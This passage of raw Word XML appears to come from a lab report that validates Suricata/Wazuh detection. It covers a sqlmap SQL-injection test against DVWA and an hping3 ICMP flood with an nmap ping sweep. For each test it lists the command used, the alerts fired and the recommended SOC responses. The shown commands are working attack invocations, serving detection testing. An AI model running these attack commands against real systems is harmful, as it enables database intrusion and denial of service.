                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="2E4750D7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7EC53D60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Source IP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FD089E7" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.131 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="73195B9F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0F50D91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Destination IP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41635C3" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.130:80/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>dvwa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(Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="45272CA2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EDCC9A4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Expected Rule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7305B30" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT in HTTP URI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="6105F8AA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AE827C9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Actual Alert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74AF0D6" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sid:2006446 — ET WEB_SERVER SQL Injection UNION SELECT (rule.id: 86601) Bonus: sid:2053467 — SQL Injection SELECT CAST         sid:2016935 — SQL Injection SELECT SLEEP Time Delay         sid:2221036 — SURICATA HTTP Response excessive header repetition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="37BD2F06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D217111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6FB74D0" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Web Application Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="207801D2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FC1BC63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76651F8B" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Critical (Level 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36EAA58A" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD6736" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2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sqlmap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-u "http://192.168.1.130/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD78C7" w14:textId="77777777" w:rsidR="008A552D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--cookie="PHPSESSID=&lt;session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&gt;;security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=low" --batch --level=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F5549" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E97E069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1. Immediately block the attacker IP at the WAF/firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388DE9B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2. Check database logs for unauthorized queries or data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D0BE91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 xml:space="preserve">3. Audit web application code for all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BADDA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4. Apply parameterized queries / prepared statements to vulnerable pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B92A56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5. Review and rotate all database credentials as a precaution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2799EA2E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 xml:space="preserve">6. Enable WAF rules to block </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> user-agent strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B99E62" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="481D829E" wp14:editId="2F28CF0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3495040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="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FDEDDE" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4B9AFB09" wp14:editId="139D6AA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3624580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" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="19114F1A" wp14:editId="4814686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3624580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9B3671" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 12: Attack 12 — ICMP Flood &amp; Ping Sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168449E5" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="008A552D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="38B41FBC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="6C139C8C" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="47699634" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="0D087938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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="713236C7" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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E6C5513" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>hping3 / Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="68D7A688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91F1F7B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Source IP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A0765C2" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.131 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="60B81F1F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41C8E31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Destination IP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687BF06" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.130 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="02C08828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28ECF37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Expected SID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BB03A7D" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2100469, 2200074</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="67A492B4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F342998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Expected Rule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F2C757F" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ET DOS ICMP Flood / ET SCAN Ping Sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="4AA80BA5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2F9CF01D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Actual Alert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2B45184" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sid:2100366 — GPL ICMP PING *NIX (rule.id: 86601) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pkts_toserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: 3,156,986 | bytes: 189MB in ~5 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="41CFF50D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BD398DA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F9BA9DA" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Misc Activity / Volumetric Flood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="20DDB75E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1F8BA14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E07809D" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Informational (Level 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74D04AB1" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE5552" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2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hping3 -1 --flood -V 192.168.1.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC0FB9" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2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nmap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192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3D318" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352623F9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 xml:space="preserve">1. Apply rate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>limiting on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ICMP traffic at the network perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133EE2CC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2. Block the source IP using firewall rules immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F6FB1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3. Monitor CPU and bandwidth utilization for service degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBCD35D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4. Check if the flood is part of a larger DDoS or distraction attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A054637" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Enable ICMP flood protection on the host firewall (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/iptables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17638500" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="008A552D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF1FC62" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="8" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="51F5BD43" wp14:editId="5B6A939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363156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5BF2BD" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p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2399"/>
        <w:gridCol w:w="6961"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="6BDCF1DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399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</w:tcPr>
          <w:p w14:paraId="067C434F" w14:textId="77777777" w:rsidR="008A552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9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</w:tcPr>
          <w:p w14:paraId="682EF0E8" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="6F46CACB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6376F3F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Victim Machine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7B39422" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ubuntu Server 24 | IP: 192.168.1.130 | Suricata 8.0.3 + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Wazuh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Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="42451A30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9DEC3E9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Attacker Machine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20E865B" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kali Linux 2025.4 | IP: 192.168.1.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="6F22E506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700A8810" w14:textId="77777777" w:rsidR="008A552D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Wazuh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Manager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F12CBD7" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ubuntu Server | IP: 192.168.1.130 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ubuntuserver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8A552D" w14:paraId="38781669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8B902EE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DVWA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CB21FBA" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Damn Vulnerable Web Application | Apache + PHP + MariaDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="1CB2E803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72008CF0" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Suricata Rules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A2BC861" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>48,919 rules loaded | EXTERNAL_NET: any (LAN testing mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="167B8C77" w14:textId="77777777" w:rsidR="009F3858" w:rsidRDefault="009F3858"/>
    <w:sectPr w:rsidR="009F3858">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="108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0A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55B095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071C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7772AA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68270C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBB88D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A443CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0ACD2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855585">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="940139110">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1933779432">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="99424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autoHyphenation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552D"/>
    <w:rsid w:val="0000796F"/>
    <w:rsid w:val="000135DF"/>
    <w:rsid w:val="00151B2A"/>
    <w:rsid w:val="001631E0"/>
    <w:rsid w:val="001C704B"/>
    <w:rsid w:val="002117B2"/>
    <w:rsid w:val="0034280E"/>
    <w:rsid w:val="00370489"/>
    <w:rsid w:val="00530A61"/>
    <w:rsid w:val="005D0AB2"/>
    <w:rsid w:val="005D113A"/>
    <w:rsid w:val="00634F7E"/>
    <w:rsid w:val="006A4C56"/>
    <w:rsid w:val="008A552D"/>
    <w:rsid w:val="008E4C2C"/>
    <w:rsid w:val="009F3858"/>
    <w:rsid w:val="00A235DE"/>
    <w:rsid w:val="00B04FC3"/>
    <w:rsid w:val="00B64FE3"/>
    <w:rsid w:val="00B651D7"/>
    <w:rsid w:val="00BA7CEC"/>
    <w:rsid w:val="00C21022"/>
    <w:rsid w:val="00C77276"/>
    <w:rsid w:val="00CF2345"/>
    <w:rsid w:val="00F95C7E"/>
    <w:rsid w:val="00FE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7E76CFC"/>
  <w15:docId w15:val="{BDEB37AA-72B0-4746-BB33-974F0CD59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7B2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Heading"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E75B6"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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64FE3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E75B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1712</Words>
  <Characters>9760</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>81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/>
      <vt:lpstr>Executive Summary</vt:lpstr>
      <vt:lpstr>Test Details</vt:lpstr>
      <vt:lpstr>    Test 1: Attack 1 — SSH Brute-force Attack</vt:lpstr>
      <vt:lpstr>    Test 2: Attack 2 — RDP Brute-force Attack</vt:lpstr>
      <vt:lpstr>    Test 3: Attack 3 — TCP SYN Port Scan</vt:lpstr>
      <vt:lpstr>    Test 4: Attack 4 — Service Version Enumeration Scan</vt:lpstr>
      <vt:lpstr>    Test 5: Attack 5 — Unauthorized Modification</vt:lpstr>
      <vt:lpstr>    </vt:lpstr>
      <vt:lpstr>    Test 6: Attack 6 — Web Shell Upload</vt:lpstr>
      <vt:lpstr>    Test 7: Attack 7 — Malicious Cron Job Entry</vt:lpstr>
      <vt:lpstr>    </vt:lpstr>
      <vt:lpstr>    Test 8: Attack 8 — EICAR Test File</vt:lpstr>
      <vt:lpstr>    Test 9: Attack 9 — Suspicious Encoded PowerShell</vt:lpstr>
      <vt:lpstr/>
      <vt:lpstr/>
      <vt:lpstr>    Test 10: Attack 10 — Netcat C2 Channel Simulation</vt:lpstr>
      <vt:lpstr>    Test 11: Attack 11 — SQL Injection via DVWA</vt:lpstr>
      <vt:lpstr>    Test 12: Attack 12 — ICMP Flood &amp; Ping Sweep</vt:lpstr>
      <vt:lpstr>    </vt:lpstr>
      <vt:lpstr>Lab Environment</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11450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DAYUTH THY</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-10T18:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-10T18:42:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>